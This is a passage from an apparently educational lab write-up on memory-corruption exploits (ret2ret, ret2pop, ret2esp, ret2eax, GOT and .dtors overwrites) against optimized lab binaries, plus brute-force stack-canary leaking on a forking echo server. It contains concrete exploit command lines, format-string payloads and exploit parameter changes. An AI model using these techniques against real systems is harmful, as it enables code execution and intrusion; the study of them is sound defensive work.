<p>However, the original exploit aimed to not overwrite the return address, but the pointer to the <code>conf</code> string in order to pass the <code>license</code> string to the <code>system</code> function instead. In the non-optimized executable, the addresses of the strings which are located in the <code>.rodata</code> section are loaded into variables on the stack (<code>char *conf</code> and <code>char *license</code>). Before executing <code>puts</code> and <code>system</code>, those addresses are taken from the stack and pushed onto the stack again as parameters to the functions. Thus, we can overwrite the stack variable <code>conf</code> with the value of <code>license</code>, i.e. the address of the other string.</p>
<p>In the optimized executable, the strings’ addresses aren’t loaded into stack variables anymore. They are directly pushed as hardcoded values onto the stack before <code>puts</code> or <code>system</code> are executed. Thus, there is simply no variable that we could overflow and thus pass another string to <code>system</code>.</p>
<p>As mentioned in the beginning, the stack buffer overflow vulnerability still exists. The <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptrexploit_optimized.sh">strptrexploit_optimized.sh</a> shell script contains an exploit that still leverages this vulnerability. Instead of overwriting a string pointer, this exploit works like a classical exploit that overwrites the return address. Here, the return address is overwritten with the address of <code>system</code> from the executables procedure linkage table (PLT). Additionally, the address of the license string is put onto the stack after the address of <code>system</code>. Thus, on returning from <code>main</code>, the executable calls <code>system</code> with the string we originally intended to pass to <code>system</code> by overwriting a string pointer as parameter.<br />
From this exploit follows that we can achieve exactly the same code execution as with the <a href="#string-pointers">exploit aiming at the non-optimized executable</a>.</p>
<p>The main difference is that this exploit relies on overwriting the return address. The original exploit is resilient against stack canaries, as it doesn’t tamper with control flow information (return address, saved frame pointer) but only with program data (the string pointers). The new exploit however fails in case of stack canaries being activated at compile time, as it strictly has to overwrite the return address.</p>
<h4 id="function-pointers-1">Function pointers</h4>
<p>A similar observation can be made concerning the <code>funcptr</code> executable.<br />
Instead of putting a function pointer variable <code>ptr</code> onto the stack, assigning the address of the function <code>function</code> to it and calling the function, GCC with optimizations enabled recognizes that the value of <code>ptr</code> does not depend on user input (apart from the buffer overflow) and also is not otherwise dynamic. Thus, this pointer is completely omitted and <code>function</code> is called directly without any pointer assignments.</p>
<p>This means that there is no pointer on the stack to overwrite so that we could make use of the buffer overflow to redirect such a pointer.</p>
<p>However, similar to the <a href="#string-pointers-1">string pointer redirection</a>, the buffer overflow vulnerability still exists and can be exploited. A possibility would be to overwrite the return address with the address of <code>system</code> in the PLT and pass a string address to it. As the only strings with known addresses are the arguments to <code>printf</code> and <code>system</code> in the function <code>function</code>, we’re very restricted here and basically could only execute code by creating an <code>echo</code> executable / shell script in a directory which is part of the PATH environment variable so that we override the original <code>echo</code> behavior. But for such an exploit, no buffer overflow is necessary, as <code>echo</code> is already executed inside of <code>function</code>.<br />
In addition, such an exploit can easily be mitigated by stack canaries which is not possible with the non-optimized variant of the executable, as in the non-optimized version not the control flow information but only the function’s data is overwritteb.</p>
<p>In conclusion, compiling this executable with compiler optimizations enabled still provides a buffer overflow vulnerability but it becomes a lot harder to exploit it and there is no easy way to see how this could be achieved with meaningful results.</p>
<h3 id="integer-overflow">Integer overflow</h3>
<p>Concerning the <code>width</code> executable, the original exploit does not work anymore if the executable was compiled with the <code>-O3</code> compiler flag. However, the fix is extraordinarily easy. Only offsets and addresses changed because less values are actually put on the stack. For example, <code>char bsize = 64;</code> is not a stack variable now, but the value <code>64</code> for comparisons is hardcoded into the binary code. In addition, the <code>secret</code> function is now located at another position in the executable because of structural rearrangements.</p>
<p>In general, the kind of exploit and how it works does not change, there is just a need to slightly change the padding and the address. Thus, the command <code>./width $(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 68 + b'\x50\x92\x04\x08' + b'A' * 56)&quot;)</code> reliably lets us jump to the secret function or wherever we want to jump.</p>
<p>For the <code>signedness</code> executable, the possibility to achieve a buffer overflow completely disappears. With optimization enabled, GCC’s analysis determines that the two buffers <code>char src[1024]</code> and <code>char dest[1024]</code> aren’t used in the further program flow and don’t contain any specialized data. Thus, they simply are completely omitted as well as the call to <code>memcpy</code> operating on those buffers. Of course, without buffers there is no possibility to overflow them and thus change the control flow.</p>
<p>However, it is still possible to observe the original vulnerability: If inputting a negative number, the size check succeeds and the program still prints out how many bytes it intended to copy, even though no actual copying is done.</p>
<h3 id="stack-divulging-methods-1">Stack divulging methods</h3>
<p>For the stack divulging methods, the <code>divulge</code> executable which creates a vulnerable network service is used. The vulnerability lies in the <code>function</code> function: This function has a buffer overflow vulnerability to change the control flow as well as a string format vulnerability to leak information about stack layout and addresses.</p>
<p>The original exploit works by overwriting the return address with the address of a buffer where we wrote our shellcode. The address of the buffer can be determined manually (by leaking the stack base address with <code>cat /proc/$(pidof divulge)/stat | awk '{ print $28 }'</code>) or automatically (by leaking data from the stack with the string format vulnerability). In both cases, the return address of <code>function</code> is then overwritten with the address of the buffer.</p>
<p>This is were the problem occurs: Because of compiler optimizations being enabled, the function <code>function</code> was completely inlined into <code>main</code>. This means that it never returns. As <code>main</code> itself has an infinite loop, the compiler also didn’t include a <code>ret</code> instruction for <code>main</code>. This means that we cannot overwrite a return address which lets us return to user-controlled code, as none of our functions ever returns.<br />
Additionally, there are no indirect <code>call</code> or <code>jmp</code> instructions which depend on stack data that we could theoretically control.</p>
<p>In conclusion, the stack buffer overflow vulnerability still exists but it remains unclear how it could be exploited to gain control over the code execution. It is more likely that the string format vulnerability can be exploited to e.g. overwrite entries in the global offset table (GOT). However, short experiments showed that even this is not easy, as</p>
<ol type="1">
<li>no “useful” functions like <code>system</code>, <code>execve</code> or similar can be found in the code and</li>
<li>the program quickly crashes if the input string is expanded too much (e.g. by <code>%.2000x</code> string format literals) in <code>sprintf</code> and it is thus necessary to overwrite an address in the GOT byte by byte (i.e. several <code>%hhn</code> string format literals instead of a single <code>%n</code>).</li>
</ol>
<h3 id="stack-juggling-methods-1">Stack juggling methods</h3>
<h4 id="ret2ret-1">ret2ret</h4>
<p>The goal of the <a href="#ret2ret">ret2ret</a> attack is to overwrite the buffer with return instructions so that the last byte of an existing pointer (here: <code>int *ptr</code>) is overwritten with <code>0x00</code> and then points into the NOP sled of our shellcode buffer. This exploit does not work always, but most of the time.</p>
<p>An interesting observation concerning the optimized version of the executable is that <code>int no = 1; int *ptr = &amp;no</code> is completely omitted by the compiler. However, the pointer <code>char *argv[]</code> (a pointer to a pointer) can be found on the stack. Sometimes, this pointers address is close enough to the address of <code>argv[1]</code> (which contains the shellcode) so that overwriting the last byte of this pointer and returning to it results in a jump into the NOP sled of our shellcode.</p>
<p>This behavior is much more unreliable than overwriting the last byte of a fixed pointer, as the fixed pointer always points onto the stack with a fixed offset and we only depend on ASLR to generate addresses in such a way that overwriting the last byte with <code>0x00</code> results in a valid address inside our NOP sled. With the behavior of the optimized executable, we also depend on the execution environment to position the program arguments at addresses that fit our needs.</p>
<p>Of course for the exploit to work, a change for the return address is necessary, as the newly compiled executable has different addresses and offsets of the instructions inside the executable. Changing <code>#define RETADDR 0x080491e6</code> to <code>#define RETADDR 0x08049093</code> in <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2retexploit.c#L7">line 7 of the ret2retexploit.c</a> source file and recompiling again fixes this issue.</p>
<h4 id="ret2pop-1">ret2pop</h4>
<p>The <a href="#ret2pop">ret2pop</a> attack works similar to the <a href="#ret2ret">ret2ret</a> attack: We overwrite the return address and following stack space with the address of a return instruction until we reach a pointer we actually want to return to.</p>
<p>In the non-optimized version, this pointer was the function call argument for the function <code>function</code> which was a pointer to <code>argv[1]</code> which contains our shellcode. Because it was passed to the function, a copy of the address was pushed on the stack before calling the function and thus was close in memory / on the stack to our buffer we wanted to overflow.</p>
<p>In the version compiled with compiler optimizations enabled, the function <code>function</code> is inlined into <code>main</code>. Thus, we cannot overwrite the function’s return address and return to its function argument. But as an alternative, we can overwrite <code>main</code>’s return address and return to <code>argv[1]</code>. The downside of this approach is that the pointer to <code>argv[1]</code> is located on the stack pretty far away from our buffer we want to overflow so that we need to overwrite more of the stack with the address of a <code>ret</code> instruction.</p>
<p>Basically, instead of returning from <code>function</code> to its own argument, we return from <code>main</code> to <code>argv[1]</code>. This can be achieved by changing <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2popexploit.c#L7">lines 7 - 10 of ret2popexploit.c</a> from</p>
<div class="sourceCode" id="cb21"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb21-1" data-line-number="1"><span class="pp">#define POPRETADDR 0x08049243</span></a>
<a class="sourceLine" id="cb21-2" data-line-number="2"><span class="pp">#define RETADDR 0x08049009</span></a>
<a class="sourceLine" id="cb21-3" data-line-number="3"><span class="pp">#define BUFFSIZE 264</span></a>
<a class="sourceLine" id="cb21-4" data-line-number="4"><span class="pp">#define CHAINSIZE 4</span></a></code></pre></div>
<p>to</p>
<div class="sourceCode" id="cb22"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb22-1" data-line-number="1"><span class="pp">#define POPRETADDR 0x08049263</span></a>
<a class="sourceLine" id="cb22-2" data-line-number="2"><span class="pp">#define RETADDR 0x080490a6</span></a>
<a class="sourceLine" id="cb22-3" data-line-number="3"><span class="pp">#define BUFFSIZE 408</span></a>
<a class="sourceLine" id="cb22-4" data-line-number="4"><span class="pp">#define CHAINSIZE 152</span></a></code></pre></div>
<p>which adapts the addresses to the differently compiled executable, drastically increases the size of the input we’re using to overflow the vulnerable buffer and also increases the chain size (i.e. number of <code>ret</code> instructions until we reach the desired location on the stack).</p>
<p>With this change, the exploit works again exactly like it was supposed to.</p>
<h4 id="ret2esp-1">ret2esp</h4>
<p>The <code>ret2esp</code> executable is also affected by compiler optimizations. Firstly, the function <code>function</code> containing the vulnerable <code>strcpy</code> call is inlined into main. Thus, we cannot overwrite the return address of <code>function</code> but only that of <code>main</code>. Secondly, we already had to add the integer <code>int j = 58623;</code> to the code in the first place, as this integer in hexadecimal encodes the opcode for <code>jmp esp</code>. In the optimized version of the executable, this integer is omitted, as it is not used anywhere in the code.</p>
<p>Therefore, we still have a buffer overflow vulnerability but cannot exploit it the way we intended to (<code>jmp esp</code> to jump directly to the shellcode on the stack). This problem can be solved by adding a <code>printf(&quot;%d\n&quot;, j);</code> call at the end of <code>main</code> of <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2esp.c">ret2ret.c</a>. This call enforces that the integer <code>j</code> or at least its value is not omitted during compilation, as it is reused in the code.<br />
In addition to that, of course the address of the encoded <code>jmp esp</code> instruction changed, as the structure of the compiled executable differs when compiled with compiler optimizations enabled. Also, <code>j</code> is not put on the stack but kept in a register, so that the padding to reach the return address can also be decreased by the amount of memory the integer takes up on the stack (i.e. 4 bytes) Thus, it is also necessary to change</p>
<div class="sourceCode" id="cb23"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb23-1" data-line-number="1"><span class="pp">#define JMPESPADDR 0x80491c5</span></a>
<a class="sourceLine" id="cb23-2" data-line-number="2"><span class="pp">#define PADDING 264</span></a></code></pre></div>
<p>to</p>
<div class="sourceCode" id="cb24"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb24-1" data-line-number="1"><span class="pp">#define JMPESPADDR 0x80490bf</span></a>
<a class="sourceLine" id="cb24-2" data-line-number="2"><span class="pp">#define PADDING 260</span></a></code></pre></div>
<p>in <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2espexploit.c#L7">ret2retexploit.c</a>.</p>
<p>Both of the described changes are necessary, as the first one ensures the inclusion of a <code>jmp esp</code> instruction and the second one accounts for the changed addresses and stack layout.</p>
<h4 id="ret2eax-1">ret2eax</h4>
<p>In the <code>ret2eax</code> executable, the vulnerable function <code>function</code> is inlined into the main function. This poses a problem, as we were relying on implicitly having the register <code>eax</code> set to the address of the buffer containing the shellcode, as this address is returned by <code>strcpy</code> in the <code>eax</code> register. Here, we’re only returning from <code>main</code> but not from the vulnerable function. Unfortunately, <code>eax</code> does not contain the address of the shellcode buffer anymore on returning from <code>main</code>, as <code>main</code> returns with the value 0 and thus <code>eax</code> is set to 0 by an <code>xor eax, eax</code> instruction before the <code>ret</code> instruction.</p>
<p>Not even removing the return statement from <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c#L10">ret2eax.c</a> solves this problem, as the compiler then not explicitely, but implicitely returns 0 from <code>main</code> and thus outputs the same compiled code.</p>
<p>However, a solution is to change</p>
<div class="sourceCode" id="cb25"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb25-1" data-line-number="1"><span class="dt">int</span> main(<span class="dt">int</span> argc, <span class="dt">char</span> *argv[]) {</a>
<a class="sourceLine" id="cb25-2" data-line-number="2">    function(argv[<span class="dv">1</span>]);</a>
<a class="sourceLine" id="cb25-3" data-line-number="3">    <span class="cf">return</span> <span class="dv">0</span>;</a>
<a class="sourceLine" id="cb25-4" data-line-number="4">}</a></code></pre></div>
<p>into</p>
<div class="sourceCode" id="cb26"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb26-1" data-line-number="1"><span class="dt">void</span> main(<span class="dt">int</span> argc, <span class="dt">char</span> *argv[]) {</a>
<a class="sourceLine" id="cb26-2" data-line-number="2">    function(argv[<span class="dv">1</span>]);</a>
<a class="sourceLine" id="cb26-3" data-line-number="3">    <span class="cf">return</span>;</a>
<a class="sourceLine" id="cb26-4" data-line-number="4">}</a></code></pre></div>
<p>as a <code>void</code> function has no specific return value and <code>eax</code> thus is not modified after calling <code>printf</code>. Therefore, <code>eax</code> still contains the address of the buffer containing the shellcode when <code>main</code> returns and as we overwrote the return address with the address of a <code>call eax</code> instruction, we’re executing the shellcode from the buffer.</p>
<p>An interesting observation is that with this change and no change made to the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eaxexploit.c">actual exploit code</a>, the exploit works for both the non-optimized and the optimized executable. This is because the address of the <code>call eax</code> instruction stayed the same and we’re writing this address to the stack several times so that it in both cases overwrites the return address (no matter whether the return address of <code>function</code> or <code>main</code>) with the address of <code>call eax</code>, even though in the optimized version we also overwrite stack space after the return address (i.e. too much of the stack), but this does no harm to the exploit itself.</p>
<h3 id="got-hijacking---ret2got-1">GOT hijacking - ret2got</h3>
<p>The <a href="#got-hijacking---ret2got">ret2got</a> exploit does not work anymore as it is pretty similar to the <a href="#string-pointers">string pointer redirection</a> exploit. Here, the goal is to overwrite the pointer <code>ptr</code> on the stack so that the pointer points to the global offset table (GOT). The next <code>strcpy(ptr, argv[2]);</code> call then copies the second command line argument into the GOT instead of into the provided buffer.</p>
<p>Because of compiler optimizations, the pointer <code>char *ptr</code> is completely omitted. There is also no easy way to force the program to insert this pointer as it is always calculated relative to the buffer address on the fly (i.e. instead of loading the desired address from the stack (from <code>ptr</code>), it is calculated via <code>lea</code> assembly instructions (relative to <code>char array[8]</code>)). Thus, there is simply no address on the stack that we could manipulate so that the write destination of <code>strcpy</code> changes.</p>
<p>However, there is a way to get the exploit working again because the buffer overflow vulnerability is not automatically patched by these optimizations. Instead of overwriting the pointer, we can still classically overwrite the return address with the address of <code>system</code> and put the corresponding argument (i.e. the address of a string) onto the stack. This allows us to still execute any program we want. However, we now rely on no stack canaries being present, as we not only overwrite non-protected data but also protected control flow information on the stack.</p>
<p>The <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2gotexploit_optimized.sh">final exploit</a> (working only with the optimized variant of the executable) is then pretty similar to the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptrexploit_optimized.sh">exploit</a> for the <a href="#string-pointers-1">optimized string pointer redirection</a>.</p>
<h3 id="off-by-one-1">Off by one</h3>
<p>The <a href="#off-by-one">off-by-one exploit</a> is based on two things:</p>
<ol type="1">
<li>Directly after the vulnerable buffer there is control flow information on the stack.</li>
<li>That control flow information (usually) is the saved frame pointer which (when modified to point to a lower address by overwriting the least significant byte with <code>0x00</code>) enables us to set the stack pointer to that address in the function we return to so that that function returns to a controlled address instead of the original return address.</li>
</ol>
<p>Both of those points are not satisfied when the <code>offbyone</code> executable is compiled with compiler optimizations enabled.<br />
There is simply no control flow information on the stack directly after the vulnerable buffer when looking at the stack frame of the <code>save</code> function. Firstly, instead of frame base pointer relative addressing (i.e. saving the old frame base pointer to the stack (= saved frame pointer), replacing the frame base pointer with the new frame base pointer (<code>mov %esp, %ebp</code>), addressing relative to <code>ebp</code> (e.g. <code>pushl 0x8(%ebp)</code>)), the optimized executable uses stack pointer relative addressing (i.e. does not save nor use the <code>ebp</code> register but only <code>esp</code> (e.g. <code>mov 0x108(%esp), %ebx</code>)).<br />
Secondly, the optimized variant uses <code>ebx</code> as a register regularly which is a <a href="https://en.wikipedia.org/wiki/X86_calling_conventions#Register_preservation">callee-saved register</a>. Thus, instead of <code>ebp</code>, <code>ebx</code> is pushed onto the stack (i.e. saved) in the function prologue and popped from the stack (i.e. restored) in the function epilogue (see assembly below). As <code>ebx</code> in our case does not contain any useful control flow information (in fact, it does not contain any useful information at all as the register’s content is discarded after returning from the <code>save</code> function), we cannot gain any control by overwriting the least significant byte with <code>0x00</code> (which is all we can do by this kind of exploit). Thus, we cannot control the control flow by overwriting meaningful data.</p>
<p>As a reference, the function prologue and epilogue in the non-optimized executable are of the form (comments added for clarification)</p>
<div class="sourceCode" id="cb27"><pre class="sourceCode asm"><code class="sourceCode fasm"><a class="sourceLine" id="cb27-1" data-line-number="1"><span class="bu">push</span>   %<span class="kw">ebp</span>         # save <span class="kw">ebp</span></a>
<a class="sourceLine" id="cb27-2" data-line-number="2"><span class="bu">mov</span>    %<span class="kw">esp</span>,%<span class="kw">ebp</span>    # set new <span class="kw">ebp</span></a>
<a class="sourceLine" id="cb27-3" data-line-number="3"><span class="bu">sub</span>    <span class="dv">$</span><span class="bn">0x100,</span>%<span class="kw">esp</span>  # increase <span class="bu">stack</span> size</a>
<a class="sourceLine" id="cb27-4" data-line-number="4">.</a>
<a class="sourceLine" id="cb27-5" data-line-number="5">.</a>
<a class="sourceLine" id="cb27-6" data-line-number="6">.</a>
<a class="sourceLine" id="cb27-7" data-line-number="7"><span class="bu">leave</span>               # <span class="pp">restore</span> <span class="kw">ebp</span> (<span class="bu">leave</span> == <span class="bu">mov</span> %<span class="kw">ebp</span>, %<span class="kw">esp</span><span class="co">; pop %ebp)</span></a>
<a class="sourceLine" id="cb27-8" data-line-number="8"><span class="bu">ret</span>                 # return</a></code></pre></div>
<p>whereas in the optimized executable they are of the form (comments added for clarification)</p>
<div class="sourceCode" id="cb28"><pre class="sourceCode asm"><code class="sourceCode fasm"><a class="sourceLine" id="cb28-1" data-line-number="1"><span class="bu">push</span>   %<span class="kw">ebx</span>         # save <span class="kw">ebx</span></a>
<a class="sourceLine" id="cb28-2" data-line-number="2"><span class="bu">sub</span>    <span class="dv">$</span><span class="bn">0x100,</span>%<span class="kw">esp</span>  # increase <span class="bu">stack</span> size</a>
<a class="sourceLine" id="cb28-3" data-line-number="3">.</a>
<a class="sourceLine" id="cb28-4" data-line-number="4">.</a>
<a class="sourceLine" id="cb28-5" data-line-number="5">.</a>
<a class="sourceLine" id="cb28-6" data-line-number="6"><span class="bu">add</span>    <span class="dv">$</span><span class="bn">0x10c,</span>%<span class="kw">esp</span>  # reduce <span class="bu">stack</span> size</a>
<a class="sourceLine" id="cb28-7" data-line-number="7"><span class="bu">pop</span>    %<span class="kw">ebx</span>         # <span class="pp">restore</span> <span class="kw">ebx</span></a>
<a class="sourceLine" id="cb28-8" data-line-number="8"><span class="bu">ret</span>                 # return</a></code></pre></div>
<p>These code examples support the above points concerning the non-exploitability of the off-by-one-vulnerability in this case.</p>
<h3 id="overwriting-.dtors-1">Overwriting .dtors</h3>
<p>Of course for the optimized executable the same restrictions and changes apply as for the non-optimized executable (c.f. <a href="#overwriting-.dtors">the section about the original exploit</a>).</p>
<p>The same exploit works with three slight changes:</p>
<ol type="1">
<li>The address of the <code>.fini_array</code> section now is <code>0x0804b17c</code> instead of <code>0x0804b168</code>. Thus, the address (provided at the start of the exploit string) has to be changed.</li>
<li>When we want to reference that address from the exploit string, it is not the first argument to <code>snprintf</code> on the stack (i.e. accessed by the <code>%hn</code> format string placeholder) but the fourth (i.e. accessed by the <code>%4$.hn</code> format string placeholder).</li>
<li>The address of the <code>globalbuff</code> array in the <code>.bss</code> section changed. Concretely, it increased by 32 which is why we also have to increase the number to overwrite the address in <code>.fini_array</code> with by 32 (i.e. 45756 “A”s for padding instead of 45724). If using a <code>%x</code> format string placeholder instead of the “A”s for padding, we can also write <code>%.45756x</code> instead for expanding the format string to the correct length we need.</li>
</ol>
<p>Thus, we can either use <code>./ret2dtors &quot;$(./shellcode)&quot; &quot;$(python3 -c &quot;import sys; sys.stdout.buffer.write(b'\x7c\xb1\x04\x08' + b'A' * 45756 + b'%4$.hn')&quot;)&quot;</code> (padding with “A”s) or <code>./ret2dtors &quot;$(./shellcode)&quot; &quot;$(python3 -c &quot;import sys; sys.stdout.buffer.write(b'\x7c\xb1\x04\x08 %.45754x %4$.hn')&quot;)&quot;</code> (format string expansion, 45754 here because of the two spaces) for a working exploit after adapting the addresses and offsets.</p>
<h1 id="stack-canary-bypassing">Stack canary bypassing</h1>
<p>In the previous sections, I have described how to bypass ASLR, non-executable stack, etc. based on several tutorials. This section now aims to bypass stack protection by stack canaries and analyzes how stack canaries are used.</p>
<p>For the whole section, ASLR is enabled.</p>
<h2 id="stack-analysis---getcanary-and-getcanarythreaded">Stack analysis - <code>getCanary</code> and <code>getCanaryThreaded</code></h2>
<p>The <code>getCanary</code> and <code>getCanaryThreaded</code> executables were created to output parts of the stack to <code>stdout</code> in order to analyze them. In order to have a stack structure as realistic as possible, ASLR is enabled and no stack protection mechanisms enabled by default in GCC were disabled.</p>
<p>The <a href="./Stack%20canary%20bypassing/getCanary.c">getCanary</a> executable forks in the <code>main</code> function and then outputs stack contents from both processes.<br />
The interesting point to observe here is that the addresses (be it stack addresses or return addresses on the stack) are the same for both processes. This makes sense, as the child process forked from the parent process gets an exact copy of the parent process’ virtual memory. In addition, the stack canary is also the same. This is because of the same reason: the virtual memory is an exact copy. However, the function of which we output the stack canary is called after forking so that it could theoretically be possible to instantiate new stack canaries for a new process.<br />
The combination of the addresses and the stack canaries staying the same can be dangerous: assume we have a vulnerable daemon (e.g. reachable over the network) that forks on every call to it. An attacker can then make as many calls as he wishes to the daemon and has the same memory layout as well as the same stack canary on every call. Thus, he can gather all the information he needs in order to craft an exploit for the vulnerability.<br />
Additionally, the stack canary is the same for every function. This allows an attacker to gather information about the stack canary through one vulnerable function of an executable and apply the gathered information in an exploit targeting a completely different function of the same executable.</p>
<p>The <a href="./Stack%20canary%20bypassing/getCanaryThreaded.c">getCanaryThreaded</a> executable creates two threads which output stack contents from both threads to <code>stdout</code>. The difference to the <code>fork</code> approach from above is that we’re only creating threads here and no distinct processes. The threads live in the same address space as the process creating the threads and don’t get assigned their own process ID. Of course they still have to work on their own stack in order to not clash with each others memory. For that reason, the memory addresses now differ and we achieve kind of an address randomization for the threads. However, this statement has a severe restriction: the memory offset for the threads is constant (here: <code>0x801000</code>). Thus, one can calculate the stack addresses of other threads by adding or subtracting this constant offset to or from a leaked stack address of the current thread.<br />
For the stack canaries, the same holds true as above. The stack canaries are the same for any thread of the currently running process. Thus, an attacker can again query a vulnerable daemon that creates new threads upon calls to it as often as he wishes to obtain information about the stack canary.<br />
An interesting observation here is that overwriting the stack canary of a thread does not cause an error. However, there is no saved frame pointer or even return address directly after the stack canary on the thread’s stack so that we can reroute the control flow of the process. Nevertheless, we can gather information about the stack canary from the threads and apply that knowledge elsewhere in the same process without having to fear a change of the stack canary.</p>
<p>An observation common to both executables is that the first byte of the stack canary (in the output: the last byte because of little endian representation) is always a <code>0x00</code> byte. This fact probably on the one hand aims to prevent string based functions (e.g. <code>printf</code>, <code>strcpy</code>, etc.) from reading the stack cookie, as the null byte marks the end of a string and functions like that thus don’t continue after such a byte is encountered. On the other hand, this means that an attacker would have to include a null byte in his payload if he wants to overwrite the stack canary with the correct value. Again, string based functions stop when reaching a null byte so that an attacker can’t use such functions to overwrite the other bytes of the canary.</p>
<h2 id="brute-force-leaking">Brute force leaking</h2>
<p>The <a href="./Stack%20canary%20bypassing/echoserver.c">echoserver</a> executable was crafted to specifically contain a buffer overflow vulnerability. It was compiled using the default compiler and linker flags of GCC and thus has stack canaries enabled. The general behavior is as follows: The main process (i.e. the manually started <code>echoserver</code> process) listens for incoming connections. On new connections, it forks and lets the newly created child process handle the connection while the parent process itself just continues waiting for new connections.<br />
The child process in the meantime reads into a buffer. However, the maximum number of bytes to read from the input stream is bigger than the buffer which is why we can achieve a buffer overflow. When we overwrite the stack canary, the process exits with an error message stating that “stack smashing [has been] detected”. Thus, it is easy to leak the canary: whenever we guess right, the process outputs a success message to the remote shell (i.e. the client’s shell) and exits normally. Whenever we guess incorrectly, the process yields an error message on the local shell (i.e. the server’s shell).</p>
<p>The approach to leak the stack canary is then to overwrite the canary byte by byte until for each byte we receive a success message and the process exits normally. This is possible because of the <a href="#stack-analysis---getcanary-and-getcanarythreaded">previously</a> observed behavior that the stack canary doesn’t change on forking, as the child process’ memory is an exact copy of the parent process’ memory. This includes the stack including the stack canaries as well.</p>
<p>This is exactly what is done in the <a href="./Stack%20canary%20bypassing/leak_canary.py">leak_canary.py</a> Python script: it connects to the vulnerable server over and over again and with each request tries to overwrite a byte of the stack canary. If it succeeds (i.e. a success message is returned), the current byte is saved and the next canary byte is evaluated. Step by step, this script recovers all 8 of the stack canary bytes.</p>
<p>The important observation is that even after we leaked the stack canary, the main process is still running correctly. This means that we could exploit the stack buffer overflow and overwrite the return address with any value we wish, as we previously recovered the stack canary successfully.</p>
<h2 id="extended-brute-force-leaking">Extended brute force leaking</h2>
<p>The <a href="#brute-force-leaking">above section</a> describes how the stack canary of a fictional vulnerable server that is based on forking in order to handle requests can be leaked.</p>
<p>An interesting approach is then to extend this idea in order to not only gather information about the address space of the executable in order to bypass the restrictions imposed by ASLR.</p>
<p>The following attacks are all targeting the <code>echoserver</code> executable already mentioned in the <a href="#brute-force-leaking">previous section</a>.</p>
<h3 id="leaking-saved-frame-pointer-and-return-instruction-pointer-return-address">Leaking saved frame pointer and return instruction pointer / return address</h3>
<p>The idea based on the following stack layout extracted by analyzing the binary (each row corresponds to 8 bytes):</p>
<pre><code>higher address  |                                   |
                +-----------------------------------+  ---+
                | return address                    |     |
                +-----------------------------------+     |
                | saved frame pointer               |     |
                +-----------------------------------+     |
                | stack canary                      |     |
                +-----------------------------------+     |
                | unreferenced junk                 |     |
                +-----------------------------------+     |
                | char buffer[255 - 248]            |     |
                | char buffer[247 - 240]            |     +--- stack frame of echo
                |            ...                    |     |
                | char buffer[15 - 8]               |     |
                | char buffer[7 - 0]                |     |
                +-----------------------------------+     |
                | ssize_t n                         |     |
                +-----------------------------------+     |
                | uint64_t *canary                  |     |
                +-----------------+-----------------+     |
                | copy of int fd  |       junk      |     |
                +-----------------+-----------------+  ---+
lower address   |                                   |</code></pre>
<p>There is a total of 12 bytes (8 bytes between buffer and stack canary, 4 bytes after the copy of the file descriptor corresponding to the socket provided as argument to <code>echo</code>) of unused memory that is never referenced in the whole function. This is probably due to stack alignment requirements.</p>
<p>We could then try to leak the stack canary with the known approach. After we know the stack canary, we could simply append it to the padding (used to overwrite <code>buffer</code> and the unused 8 bytes) and try the same approach for the saved frame pointer and later again for the return address.</p>
<p>If we manage to leak the saved frame pointer with this approach, we can determine stack addresses by analyzing the stack layout or determining offsets and with the help of some offsets the stack base address.<br />
If we manage to leak the return address with this approach, we can determine the base address where the ELF executable is loaded into memory, as we know the offset of the original return address from the base address (determined via <code>objdump -d echoserver</code> from the position independent executable).</p>
<p>The former result could help us to manipulate specific stack contents, the latter result could allow us to create ROP chains making use of the code found in the executable. With such ROP chains, we could maybe even leak addresses saved in the global offset table and thus determine the base address where libc is loaded.</p>
<p>As the server forks on each request, the memory layout is the same for each request and we can thus apply information gathered by one request on any following requests to the server.</p>
<p>However, there is a problem with this idea: The brute force script (<a href="./Stack%20canary%20bypassing/poc.py">poc.py</a> Python script) relies on the server’s behavior concerning success messages (here: “OK” as success message). When we overwrite the stack canary with a wrong value, the server immediately aborts on trying to return from the <code>echo</code> function and thus never sends the success message. Thus, the client knows that the value was incorrect.<br />
The behavior is a little bit different concerning the saved frame pointer or the return address. If we provide incorrect values for those, the server is likely to crash with a segmentation fault or an illegal instruction fault or some similar errors when trying to return from <code>echo</code>. However, it is just likely to crash, it does not crash necessarily. For example, if we overwrite the return address in such a way that the program returns to valid code (e.g. in <code>main</code>, right before the call to <code>echo</code>), the server could still return a success message and the client would assume that it found the correct value even if it is not the case. The other way round, the server could return to valid code and continue working just fine (e.g. by returning into <code>main</code> so that only exactly the sending of the success message is skipped) but the client would assume that an error occured because no success message was received.</p>
<p>Those examples show that concerning the saved frame pointer and the return address, the brute force script might not be able to really distinguish between a crashed server because of incorrect values or a only seemingly crashed server. Because of that, those values cannot be determined reliably and other approaches should be evaluated.</p>
<p>An interesting observation is that this approach seems to work more reliably if a short delay between requests to the server is introduced. Without any delay, <code>echoserver</code> processes are spawned so quickly on the server that the main memory runs full as those processes have to wait for TCP connections to close (TIME_WAIT) and they thus cannot exit immediately after having finished the main work.<br />
With a delay introduced, the server isn’t hit with requests as hard and thus the memory does not fill up completely as fast. This seems to make the approach described in this section much more reliable. The <code>poc.py</code> script can thus determine the stack canary, saved frame pointer and return address in most of the cases. Additional measures that increased the success reliability were to increase the memory of the virtual machine (4GiB =&gt; 8GiB) and wait between several runs until all TCP sessions are closed (open connections can be determined via <code>netstat -tupan</code>).<br />
